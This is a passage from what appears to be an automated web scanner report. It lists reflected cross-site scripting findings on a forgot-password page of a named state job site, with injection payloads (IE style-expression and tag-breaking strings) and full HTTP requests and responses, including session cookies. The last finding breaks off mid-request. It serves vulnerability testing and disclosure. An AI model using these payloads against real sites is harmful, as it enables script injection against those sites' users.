Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:09:02'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="bltextboxextradonotuse1" value="c5253"style="x:expression(alert(1))"6a3bba82691" class="cfTransparent" />
...[SNIP]...

3.122. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [CFTEXTBOXEXTRADONOTUSE_prev parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the CFTEXTBOXEXTRADONOTUSE_prev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8487"style%3d"x%3aexpression(alert(1))"a92543e7b70 was submitted in the CFTEXTBOXEXTRADONOTUSE_prev parameter. This input was echoed as a8487"style="x:expression(alert(1))"a92543e7b70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 613

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&
...[SNIP]...
=2&ERRORFIELDS_prev=usvuserid&LIBRARY_ERRORMESSAGE_prev=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&CFTEXTBOXEXTRADONOTUSE_prev=a8487"style%3d"x%3aexpression(alert(1))"a92543e7b70&RAND_prev=1902&BLTEXTBOXEXTRADONOTUSE1_prev=&OLD_CHOICE_prev=2&FORMID_prev=10&SECURITYSYS_prev=on&FormName=Form0

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:55'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="cftextboxextradonotuse" value="a8487"style="x:expression(alert(1))"a92543e7b70" class="cfTransparent" />
...[SNIP]...

3.123. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [ERRORFIELDS parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the ERRORFIELDS request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6034"style%3d"x%3aexpression(alert(1))"b3d03e576d5baaa17 was submitted in the ERRORFIELDS parameter. This input was echoed as b6034"style="x:expression(alert(1))"b3d03e576d5baaa17 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuseridb6034"style%3d"x%3aexpression(alert(1))"b3d03e576d5baaa17&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:01 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="ERRORFIELDS_prev" value="usvuseridb6034"style="x:expression(alert(1))"b3d03e576d5baaa17" />
...[SNIP]...

3.124. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [FORMID_prev parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the FORMID_prev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d2b5"style%3d"x%3aexpression(alert(1))"372f5e60b41 was submitted in the FORMID_prev parameter. This input was echoed as 8d2b5"style="x:expression(alert(1))"372f5e60b41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 613

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&
...[SNIP]...
e%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&CFTEXTBOXEXTRADONOTUSE_prev=&RAND_prev=1902&BLTEXTBOXEXTRADONOTUSE1_prev=&OLD_CHOICE_prev=2&FORMID_prev=108d2b5"style%3d"x%3aexpression(alert(1))"372f5e60b41&SECURITYSYS_prev=on&FormName=Form0

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:08 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:09:08'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="formid" value="108d2b5"style="x:expression(alert(1))"372f5e60b41" class="cfTransparent" />
...[SNIP]...

3.125. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [FORMNAME_prev parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the FORMNAME_prev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a32fd"style%3d"x%3aexpression(alert(1))"645ffa01d98 was submitted in the FORMNAME_prev parameter. This input was echoed as a32fd"style="x:expression(alert(1))"645ffa01d98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 613

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=2&U_name=yes&choice=2&cftextboxextradonotuse=&bltextboxextradonotuse1=&FORMNAME_prev=Form0a32fd"style%3d"x%3aexpression(alert(1))"645ffa01d98&CHOICE_prev=2&ERRORFIELDS_prev=usvuserid&LIBRARY_ERRORMESSAGE_prev=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&CFTEXTBOXEXTRADO
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:51 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:51'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="formname" value="Form0a32fd"style="x:expression(alert(1))"645ffa01d98" class="cfTransparent" />
...[SNIP]...

3.126. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [FormID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the FormID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50bdc"><a>d414acd7200 was submitted in the FormID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=1050bdc"><a>d414acd7200&rand=1902 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 499

library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cf
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:16 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<a href="/ada/mn_forgotpass.cfm?securitysys=on&amp;formid=1050bdc"><a>d414acd7200&amp;rand=887277&amp;choice=1">
...[SNIP]...

3.127. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [FormName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the FormName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed897"style%3d"x%3aexpression(alert(1))"6af9926f561ad08f3 was submitted in the FormName parameter. This input was echoed as ed897"style="x:expression(alert(1))"6af9926f561ad08f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuserid&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0ed897"style%3d"x%3aexpression(alert(1))"6af9926f561ad08f3 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:08 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="FORMNAME_prev" value="Form0ed897"style="x:expression(alert(1))"6af9926f561ad08f3" />
...[SNIP]...

3.128. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [FormName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the FormName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bbf0"style%3d"x%3aexpression(alert(1))"34e6cd92313 was submitted in the FormName parameter. This input was echoed as 2bbf0"style="x:expression(alert(1))"34e6cd92313 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
